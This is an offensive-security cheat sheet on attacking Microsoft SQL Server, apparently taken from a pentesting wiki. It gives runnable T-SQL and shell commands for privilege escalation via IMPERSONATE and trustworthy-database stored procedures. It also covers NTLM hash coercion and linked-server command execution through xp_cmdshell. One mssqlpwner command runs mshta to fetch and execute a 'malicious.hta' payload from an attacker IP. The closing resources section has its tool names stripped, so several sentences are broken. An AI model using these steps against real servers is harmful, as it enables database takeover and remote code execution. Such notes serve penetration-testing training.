Microsoft SQL Server(MSSQL) is a relational database management system developed by Microsoft. By default, it runs on port TCP 1433
Default MS-SQL System Tables:
master Database: Records all the system-level information for an instance of SQL Server.
msdb Database: Is used by SQL Server Agent for scheduling alerts and jobs.
model Database: Is used as the template for all databases created on the instance of SQL Server. Modifications made to the model database, such as database size, collation, recovery model, and other database options, are applied to any databases created afterwards.
Resource Databas: Is a read-only database that contains system objects that are included with SQL Server. System objects are physically persisted in the Resource database, but they logically appear in the sys schema of every database.
tempdb Database : Is a work-space for holding temporary objects or intermediate result sets.
Practice
Enumerate
Using nmap scripts, we can enumerate the version of the TNS-Listener
To enumerate Databases, Tables, Columns, Users, Permissions, refers to the following page
Brute Force Credentials
If you don'thave credentials you can try to guess them. You can use nmap or metasploit. Be careful, you can block accounts if you fail login several times using an existing username.
To localy execute/read/write files on an MSSQL instance, see the following page:
Coerced Auths (Stealing NTLM Hash)
On MS-SQL (Microsoft SQL) servers, the EXEC method can be used to access a remote SMB share. MSSQL uses Keberos to authenticate users so we can retrieve the NTLM hash.
MSSQL Privilege Escalation
SQL Server has a special permission, named IMPERSONATE, that allows the executing user to take on the permissions of another user or login until the context is reset or the session ends.
To enumerate users that you can impersonate, run the following queries
# Find users you can impersonate
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
# Check if the user "sa" or any other high privileged user is mentioned
SQL (dbo@ScrambleHR)> enum_impersonate
If you can impersonate a user, even if he isn't sysadmin, you should check if the user has access to other databases or linked servers.
# Impersonate sa user
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
Note that once you are sysadmin you can impersonate any other one:
-- Impersonate RegUser
EXECUTE AS LOGIN = 'RegUser'
-- Verify you are now running as the the MyUser4 login
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
-- Change back to sa
REVERT
If a regular user is given the role db_owner over the database owned by an admin user (such as sa) and that database is configured as trustworthy, that user can abuse these privileges to privesc because stored procedures created in there that can execute as the owner (admin).
Windows
To enumerate, run the following queries
# Get owners of databases
SELECT suser_sname(owner_sid) FROM sys.databases
# Find trustworthy databases
SELECT a.name,b.is_trustworthy_on
FROM master..sysdatabases as a
INNER JOIN sys.databases as b
ON a.name=b.name;
# Get roles over the selected database (look for your username as db_owner)
USE <trustworthy_db>
SELECT rp.name as database_role, mp.name as database_user
from sys.database_role_members drm
join sys.database_principals rp on (drm.role_principal_id = rp.principal_id)
join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)
If you found you are db_owner of a trustworthy database, you can privesc
--1. Create a stored procedure to add your user to sysadmin role
USE <trustworthy_db>
CREATE PROCEDURE sp_elevate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'USERNAME','sysadmin'
--2. Execute stored procedure to get sysadmin role
USE <trustworthy_db>
EXEC sp_elevate_me
--3. Verify your user is a sysadmin
SELECT is_srvrolemember('sysadmin')
The user running MSSQL server will have enabled the privilege token SeImpersonatePrivilege.
You probably will be able to escalate to Administrator or NT AUTHORITY\SYSTEM following this page:
We can also enumerate Linked Servers using the followins SQL query on a MSSQL instance:
EXEC sp_linkedservers;
Remote Execution
The SQL login on the Linked SQL Server must be sysadmin
# mssqlclient.py
mssqlclient.py -port 1433 <DOMAIN>/<USERNAME>:<PASSWORD>@<TARGET>
SQL (dbo@master)> use_link <LINKED_SRV_NAME>
SQL >APPSRV01 (sa dbo@master)> enable_xp_cmdshell
SQL >APPSRV01 (sa dbo@master)> xp_cmdshell whoami
# MSSqlPwner
## Execution using using stored procedures
mssqlpwner <DOMAIN>/<USER>:<PASSWORD>@<TARGET> -windows-auth exec whoami -link-name <LINKED_SRV_NAME>
## Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method
mssqlpwner <DOMAIN>/<USER>:<PASSWORD>@<TARGET> -windows-auth -link-name <LINKED_SRV_NAME> exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate
Resources
Using , we may bruteforce MSSQL credentials.
Using from , we can login to an MSSQL instance.
Using we can connect to a MSSQL instance.
Tools like can be used to login to an MSSQL instance, and to perform SQL queries.
Tools like can be used to execute OS commands from MSSQL
can be used to execute remote commands through various methods.
Using from , we may be able to execute code.
From an UNIX-Like host, using , we can enumerate for impersonation privileges and PrivEsc as follows
We may also use from to enumerate users that we can impersonate
Otherwise, we can use powershell script to automate the exploit
are typically configured to enable the database engine to execute a Transact-SQL statement that includes tables in another instance of SQL Server, or another database product such as Oracle.
From an UNIX-Like machine, we can enumerate Linked SQL Servers using or .
From an UNIX-Like machine, we can execute code on a Linked SQL Servers using or .
